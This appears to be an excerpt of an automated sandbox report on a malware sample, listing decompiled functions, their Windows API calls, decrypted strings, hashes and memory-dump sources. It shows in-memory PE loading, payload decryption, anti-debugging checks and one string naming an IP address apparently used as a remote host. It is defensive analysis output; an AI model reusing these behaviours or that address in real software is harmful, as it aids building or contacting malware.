                      • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04944011
                      • Sleep.KERNEL32(000003E8), ref: 049441A9
                      • __Init_thread_footer.LIBCMT ref: 0494477E
                      • __Init_thread_footer.LIBCMT ref: 04944944
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04946D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04944B4E
                      • __Init_thread_footer.LIBCMT ref: 04944BDC
                      • __Init_thread_footer.LIBCMT ref: 04944E45
                      • CoInitialize.OLE32(00000000), ref: 04944EC6
                      • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04944EE1
                      • __Init_thread_footer.LIBCMT ref: 04945344
                      • Sleep.KERNEL32(00000BB8,00000000,?,04946D08,0041D8D0,0042DBDC,0042DBDD), ref: 0494555C
                      • __Init_thread_footer.LIBCMT ref: 04945652
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04946D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04944F4F
                        • Part of subcall function 04950A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04945D06,00000000,0042C014), ref: 04950A9E
                        • Part of subcall function 04950A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04950ABD
                      • __Init_thread_footer.LIBCMT ref: 049442AD
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                        • Part of subcall function 04942487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049424BD
                        • Part of subcall function 04942487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049424DE
                        • Part of subcall function 04942487: CloseHandle.KERNEL32(00000000), ref: 049424E5
                      • __Init_thread_footer.LIBCMT ref: 04944489
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$Y@BA$ZK\.$rmBK
                      • API String ID: 529012138-2214808123
                      • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                      • Instruction ID: c7159e2a2b0f1289da68588af35ef38dd43b4696ebd16d85f09c813e05ee9f51
                      • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                      • Instruction Fuzzy Hash: ADF2E2B0D042589FEB24CF24CC48BADBBB4AF85308F5442E8E5096B291DB75BAC5CF55
                      Function 00402EE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 454COMMON
                      Download Yara Rule
                      APIs
                      • SetLastError.KERNEL32(0000000D), ref: 00402F02
                      • SetLastError.KERNEL32(000000C1), ref: 00402F44
                      Strings
                      • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                      • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                      • Size is not valid!, xrefs: 00402F08
                      • Section alignment invalid!, xrefs: 00402FC7
                      • DOS header is not valid!, xrefs: 00402F32
                      • ERROR_OUTOFMEMORY!, xrefs: 00403062
                      • DOS header size is not valid!, xrefs: 00402F71
                      • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                      • API String ID: 1452528299-2436911586
                      • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                      • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                      Function 004035D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,79D989F6), ref: 00403650
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                      • GetLastError.KERNEL32 ref: 004036E8
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                      • GetLastError.KERNEL32 ref: 0040371A
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                      • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                      • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                      Function 04943837 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049438B7
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049438DB
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04943945
                      • GetLastError.KERNEL32 ref: 0494394F
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04943977
                      • GetLastError.KERNEL32 ref: 04943981
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04943991
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04943A53
                      • CryptDestroyKey.ADVAPI32(?), ref: 04943AC5
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04943893
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction ID: e28709bbd0167317d677ed61e52becdf7b2194bc70acfa8282d58d6545c7aa2a
                      • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction Fuzzy Hash: E6814071B002189FEF249F24CC45F9ABBB5EF89300F1481B9E94DA7291DB31AA858F55
                      Function 00402A50 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                      • LocalFree.KERNEL32(00000000), ref: 00402B62
                      • LocalFree.KERNEL32(?), ref: 00402B67
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                      • String ID: %s: %s$Error protecting memory page
                      • API String ID: 839691724-1484484497
                      • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                      • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                      Function 049451D7 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 621sleepCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04950A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04945D06,00000000,0042C014), ref: 04950A9E
                        • Part of subcall function 04950A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04950ABD
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04945344
                      • Sleep.KERNEL32(00000BB8,00000000,?,04946D08,0041D8D0,0042DBDC,0042DBDD), ref: 0494555C
                      • __Init_thread_footer.LIBCMT ref: 04945652
                      • Sleep.KERNEL32(000007D0), ref: 049459BC
                      • Sleep.KERNEL32(000007D0), ref: 049459D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: @BAO$updateSW
                      • API String ID: 3554146954-956047173
                      • Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                      • Instruction ID: d3efd1138fe657fe5c3fdb2a7824117cb0b434d4ee3e7aa1a8d0e1e9d57ea948
                      • Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                      • Instruction Fuzzy Hash: 9A3224B1D002549BEF28DF64CC48BAEBBB4AF81318F1542F9D4096B291DB75AE84CF45
                      Function 005D483A Relevance: 10.3, Strings: 7, Instructions: 1588COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: Bu7$^\o$j9E$l~$szv[$szv[$]M
                      • API String ID: 0-3990430381
                      • Opcode ID: 3bdac6a2f9ca15f2f1d4381398ea43e72116445f60213044dda7447274e4ce29
                      • Instruction ID: d3776f6fd038895c9a59e5b105fd12283626dffd50783d6a79828c2877a3d8c4
                      • Opcode Fuzzy Hash: 3bdac6a2f9ca15f2f1d4381398ea43e72116445f60213044dda7447274e4ce29
                      • Instruction Fuzzy Hash: C6B2F4F3A0C6049FE304AE2DDC8567AFBE5EF94620F1A493DEAC4C7740EA3558058697
                      Function 005D62D5 Relevance: 10.3, Strings: 7, Instructions: 1568COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: )K[/$-|^$2`l{$2y4$anh?$kYo~$n(s
                      • API String ID: 0-2341076803
                      • Opcode ID: 8c0752214133b26571dd84f2b9cbbadd63e363c59522a6b729147e171c2818a1
                      • Instruction ID: 2c214f45fe069bb082464012a7b27f67f9c4500e2fc640b9b3d7320f177ba3ac
                      • Opcode Fuzzy Hash: 8c0752214133b26571dd84f2b9cbbadd63e363c59522a6b729147e171c2818a1
                      • Instruction Fuzzy Hash: F7B2E3F360C2049FE308AE2DEC8567ABBE9EF94720F16493DE6C5C7744EA3558048697
                      Function 0041A346 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                      • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                      Function 005DB20F Relevance: 9.1, Strings: 6, Instructions: 1591COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 1jwt$2KW3$Wr?_$v{g$0_{$LlK
                      • API String ID: 0-2574484924
                      • Opcode ID: 2ef90ecee5913f1cb820ccb2b77b915ab2d066fec45e7c1db98966a16b70f6a6
                      • Instruction ID: 0ee09096c6d5bbad2909acd36cd473c546fab450177273ce538d8d7217357b00
                      • Opcode Fuzzy Hash: 2ef90ecee5913f1cb820ccb2b77b915ab2d066fec45e7c1db98966a16b70f6a6
                      • Instruction Fuzzy Hash: 06B207F360C204AFE7046E2DEC8567AFBE9EF94720F16893DEAC483744E63558058697
                      Function 005D2D71 Relevance: 9.1, Strings: 6, Instructions: 1581COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2 y$7Tm$`Rv$`y@u$e(2]$5?o
                      • API String ID: 0-674698629
                      • Opcode ID: c76da4c0fa373625079375407c477a72830d562d5e83dfc949c442c9a2414b1b
                      • Instruction ID: 8f7f75c9eaff73d8836d398441331e84d028458bce32c96937f23de36ae52e07
                      • Opcode Fuzzy Hash: c76da4c0fa373625079375407c477a72830d562d5e83dfc949c442c9a2414b1b
                      • Instruction Fuzzy Hash: 81B208F3A082009FE314AE2DDC8566ABBEAEFD4720F1A853DE6C4C7744E63558058697
                      Function 00401970 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID: text
                      • API String ID: 3197321146-999008199
                      • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                      • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                      Function 005E507D Relevance: 6.6, Strings: 4, Instructions: 1634COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: COR$$ZwS$qx/$0~
                      • API String ID: 0-681313600
                      • Opcode ID: 81266a29e0405d02b955d789d63249f2bb3305f4842471a2fd83f20afc8d358d
                      • Instruction ID: c6e51c3a3388742c532369b3e8eaaea841d7581c226e9d8855c416ff7865fff2
                      • Opcode Fuzzy Hash: 81266a29e0405d02b955d789d63249f2bb3305f4842471a2fd83f20afc8d358d
                      • Instruction Fuzzy Hash: 0DB215F3A0C2149FE304AE2DEC8567ABBE5EF94320F1A893DE6C4C7744E63558058792
                      Function 00410940 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                      Function 04950BA7 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 819956c8da69d9361fbf4e47ff42106ad8a36c3f0c6e400b1e605b299af52eb5
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 3B022B71E012199FDB14CFA8C980BAEBBB5FF88314F248669D919EB350D731A945CB90
                      Function 0040A58A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                      • IsDebuggerPresent.KERNEL32 ref: 0040A662
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                      Function 0494A7F1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0494A7FD
                      • IsDebuggerPresent.KERNEL32 ref: 0494A8C9
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0494A8E9
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0494A8F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: 94c94a44b135ae989381e55fd8a71094e507e145c67eccc9764a277a8ef2010e
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: C1312975D4521CDBDB10DFA4D989BCDBBB8BF48304F1040AAE50DAB250EB71AA85CF44
                      Function 005E0169 Relevance: 5.3, Strings: 3, Instructions: 1514COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: r}$0($`,O
                      • API String ID: 0-3337568009
                      • Opcode ID: bdb37a88f25d5834bffceefb2514544e1b1c23cc08f6ca29129898fdb7304190
                      • Instruction ID: 4d0689223c9f81fe8f54824ce0ae5c0eaeb187e00e8bc79e878c24d93b0adb73
                      • Opcode Fuzzy Hash: bdb37a88f25d5834bffceefb2514544e1b1c23cc08f6ca29129898fdb7304190
                      • Instruction Fuzzy Hash: 99A204F360C6009FE304AE29EC8567AFBE5EF94720F16893DEAC4C7744E63598058697
                      Function 0040CDE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                      • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                      Function 0494D04A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04942AA0), ref: 0494D142
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04942AA0), ref: 0494D14C
                      • UnhandledExceptionFilter.KERNEL32(0494277A,?,?,?,?,?,04942AA0), ref: 0494D159
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction ID: 21efebb5599d5716e685dac3d0bd9a8c9b414818c4671e61e10afad7f7c4e334
                      • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction Fuzzy Hash: 9331A7759112289BCB61DF64DC89BDDBBB8BF48310F5041EAE81CA7260E770AF858F44
                      Function 005D97F2 Relevance: 4.1, Strings: 2, Instructions: 1577COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: &qI$b!w
                      • API String ID: 0-2825573136
                      • Opcode ID: 7b9f4cc0877dce6912bcc471352275226ea2c5d293311d3ec9b7d47dcd667461
                      • Instruction ID: 2747edcbf84934c4366ab91f2b26374a840f6942f8198cf63c28fbf37ff610c5
                      • Opcode Fuzzy Hash: 7b9f4cc0877dce6912bcc471352275226ea2c5d293311d3ec9b7d47dcd667461
                      • Instruction Fuzzy Hash: F0B2D3F360C2049FE304AE2DEC8567ABBE9EF94720F16493DEAC4C7344EA3558458697
                      Function 0494092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: 25c07b4df250cc591a60015adfc3b3f30e6c5af78002851d15ca102c04993424
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: D9316CB6910609DFEB10CF99C880AAEBBF9FF88328F14405AD541A7310D771FA45CBA4
                      Function 00410822 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,79D989F6), ref: 00410837
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1518329722-0
                      • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
